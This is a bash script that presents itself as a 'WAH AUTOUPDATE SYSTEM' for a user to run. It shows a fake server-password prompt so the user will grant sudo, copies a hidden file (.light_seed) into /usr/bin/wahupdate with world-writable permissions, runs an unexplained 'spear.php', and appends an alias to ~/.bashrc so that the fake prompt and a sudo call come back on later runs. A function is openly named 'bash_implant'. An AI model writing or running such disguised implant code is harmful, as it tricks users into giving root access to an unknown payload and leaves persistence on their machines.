#!/bin/bash

out_msg() {
    echo '################################'
    echo ''
    echo '     WAH AUTOUPDATE SYSTEM'
    echo ''
    echo 'Please make sure you have a stable'
    echo '      internet connection'
    echo ''
    echo '********************************'
    echo ' Please prepare server password.'
    echo ' If you do not know the server'
    echo ' password, please call WAH Office'
    echo '********************************'
}




fx_init_bash_implant() {
    out_msg
    echo "PLEASE ENTER SERVER PASSWORD:"
    sudo cp .light_seed /usr/bin/wahupdate
    sudo chmod 777 /usr/bin/wahupdate
}


 #lets do some pre-flight checks


    php spear.php



    #DITO KA NALANG MAG CHECK NG MGA FILES HAYUP KA HAHAHAHA BAT KA PA NAG PHP
    if grep -q "0" ".blood"
    then
        echo "alias 'wahupdate'='echo ***PLEASE ENTER SERVER PASSWORD*** && sudo /usr/bin/wahupdate'" >> ~/.bashrc
        fx_init_bash_implant
    else
        fx_init_bash_implant
        wahupdate
    fi

    alias 'nautilis'='cd'